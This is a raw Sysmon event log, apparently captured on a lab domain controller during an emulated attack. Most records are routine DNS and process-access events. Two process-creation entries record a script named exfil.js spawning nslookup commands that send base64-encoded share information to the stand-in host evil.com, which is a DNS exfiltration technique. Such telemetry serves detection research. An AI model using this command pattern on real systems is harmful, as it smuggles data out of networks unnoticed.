10341000x8000000000000000198956Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.381{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198955Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.381{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198954Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.381{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198953Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.381{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-D83F-000000005F02}7476C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198952Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.381{2E1864BB-17A1-629A-783D-000000005F02}55527392C:\Windows\System32\WScript.exe{2E1864BB-17BA-629A-D83F-000000005F02}7476C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198951Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.390{2E1864BB-17BA-629A-D83F-000000005F02}7476C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbaov.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198950Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.381{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlxhmwqur.tmpMD5=761C32825E612E802625B3B432A8B214,SHA256=93B655C823F758E66012CC507AD76996E6991D3C8795548139308F047C0D31E1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198949Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.350{2E1864BB-17BA-629A-D63F-000000005F02}24444760C:\Windows\system32\conhost.exe{2E1864BB-17BA-629A-D73F-000000005F02}5764C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198948Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.350{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198947Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.350{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198946Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.350{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198945Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.350{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198944Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.350{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BA-629A-D73F-000000005F02}5764C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198943Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.350{2E1864BB-17BA-629A-D53F-000000005F02}73764672C:\Windows\system32\cmd.exe{2E1864BB-17BA-629A-D73F-000000005F02}5764C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198942Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:26.360{2E1864BB-17BA-629A-D73F-000000005F02}5764C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BA-629A-D53F-000000005F02}7376C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxhmwqur.tmp 2>&1 354300x8000000000000000198941Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.772{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52571- 354300x8000000000000000198940Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.772{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52570- 354300x8000000000000000198939Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.771{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52569- 354300x8000000000000000198938Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.693{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52568- 354300x8000000000000000198937Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.692{00000000-0000-0000-0000-000000000000}3956<unknown process>-udptruefalse127.0.0.1-52568-false127.0.0.1-53domain 354300x8000000000000000198936Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.692{00000000-0000-0000-0000-000000000000}3956<unknown process>-udpfalsefalse127.0.0.1-52567-false127.0.0.1-53domain 354300x8000000000000000198935Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.692{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52567- 354300x8000000000000000198934Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.692{00000000-0000-0000-0000-000000000000}3956<unknown process>-udptruefalse127.0.0.1-52567-false127.0.0.1-53domain 354300x8000000000000000198933Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.692{00000000-0000-0000-0000-000000000000}3956<unknown process>-udpfalsefalse127.0.0.1-52566-false127.0.0.1-53domain 354300x8000000000000000198932Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.692{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52566- 354300x8000000000000000198931Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.692{00000000-0000-0000-0000-000000000000}3956<unknown process>-udptruefalse127.0.0.1-52566-false127.0.0.1-53domain 354300x8000000000000000198930Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.544{00000000-0000-0000-0000-000000000000}2260<unknown process>-udpfalsefalse127.0.0.1-52565-false127.0.0.1-53domain 354300x8000000000000000198929Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.544{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52565- 354300x8000000000000000198928Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.544{00000000-0000-0000-0000-000000000000}2260<unknown process>-udptruefalse127.0.0.1-52565-false127.0.0.1-53domain 354300x8000000000000000198927Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.544{00000000-0000-0000-0000-000000000000}2260<unknown process>-udpfalsefalse127.0.0.1-52564-false127.0.0.1-53domain 354300x8000000000000000198926Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.544{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52564- 354300x8000000000000000198925Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.544{00000000-0000-0000-0000-000000000000}2260<unknown process>-udptruefalse127.0.0.1-52564-false127.0.0.1-53domain 354300x8000000000000000198924Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.544{00000000-0000-0000-0000-000000000000}2260<unknown process>-udpfalsefalse127.0.0.1-52563-false127.0.0.1-53domain 354300x8000000000000000198923Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.544{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52563- 354300x8000000000000000198922Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.544{00000000-0000-0000-0000-000000000000}2260<unknown process>-udptruefalse127.0.0.1-52563-false127.0.0.1-53domain 354300x8000000000000000198921Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.469{00000000-0000-0000-0000-000000000000}2608<unknown process>-udpfalsefalse127.0.0.1-52562-false127.0.0.1-53domain 354300x8000000000000000198920Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.469{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52562- 354300x8000000000000000198919Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.469{00000000-0000-0000-0000-000000000000}2608<unknown process>-udptruefalse127.0.0.1-52562-false127.0.0.1-53domain 354300x8000000000000000198918Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.469{00000000-0000-0000-0000-000000000000}2608<unknown process>-udpfalsefalse127.0.0.1-52561-false127.0.0.1-53domain 354300x8000000000000000198917Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.469{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52561- 354300x8000000000000000198916Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.469{00000000-0000-0000-0000-000000000000}2608<unknown process>-udptruefalse127.0.0.1-52561-false127.0.0.1-53domain 354300x8000000000000000198915Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.468{00000000-0000-0000-0000-000000000000}2608<unknown process>-udpfalsefalse127.0.0.1-52560-false127.0.0.1-53domain 354300x8000000000000000198914Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.468{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52560- 354300x8000000000000000198913Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.468{00000000-0000-0000-0000-000000000000}2608<unknown process>-udptruefalse127.0.0.1-52560-false127.0.0.1-53domain 354300x8000000000000000198912Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.386{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52559- 354300x8000000000000000198911Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.386{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52558- 354300x8000000000000000198910Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.385{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52557- 354300x8000000000000000198909Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.385{00000000-0000-0000-0000-000000000000}1144<unknown process>-udptruefalse127.0.0.1-52557-false127.0.0.1-53domain 354300x8000000000000000198908Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.291{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52556- 354300x8000000000000000198907Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.291{00000000-0000-0000-0000-000000000000}7628<unknown process>-udptruefalse127.0.0.1-52556-false127.0.0.1-53domain 354300x8000000000000000198906Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.289{00000000-0000-0000-0000-000000000000}7628<unknown process>-udpfalsefalse127.0.0.1-52555-false127.0.0.1-53domain 354300x8000000000000000198905Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.289{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52555- 354300x8000000000000000198904Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.289{00000000-0000-0000-0000-000000000000}7628<unknown process>-udptruefalse127.0.0.1-52555-false127.0.0.1-53domain 354300x8000000000000000198903Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.289{00000000-0000-0000-0000-000000000000}7628<unknown process>-udpfalsefalse127.0.0.1-52554-false127.0.0.1-53domain 354300x8000000000000000198902Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.289{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52554- 354300x8000000000000000198901Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.288{00000000-0000-0000-0000-000000000000}7628<unknown process>-udptruefalse127.0.0.1-52554-false127.0.0.1-53domain 354300x8000000000000000198900Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.201{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52553- 354300x8000000000000000198899Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.201{00000000-0000-0000-0000-000000000000}8132<unknown process>-udptruefalse127.0.0.1-52553-false127.0.0.1-53domain 354300x8000000000000000198898Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.200{00000000-0000-0000-0000-000000000000}8132<unknown process>-udpfalsefalse127.0.0.1-52552-false127.0.0.1-53domain 354300x8000000000000000198897Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.200{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52552- 354300x8000000000000000198896Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.200{00000000-0000-0000-0000-000000000000}8132<unknown process>-udptruefalse127.0.0.1-52552-false127.0.0.1-53domain 354300x8000000000000000198895Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.199{00000000-0000-0000-0000-000000000000}8132<unknown process>-udpfalsefalse127.0.0.1-52551-false127.0.0.1-53domain 354300x8000000000000000198894Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.199{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52551- 354300x8000000000000000198893Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.199{00000000-0000-0000-0000-000000000000}8132<unknown process>-udptruefalse127.0.0.1-52551-false127.0.0.1-53domain 354300x8000000000000000198892Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.085{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52550- 354300x8000000000000000198891Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.083{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52549- 354300x8000000000000000198890Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.082{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52548- 354300x8000000000000000198889Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.082{00000000-0000-0000-0000-000000000000}6892<unknown 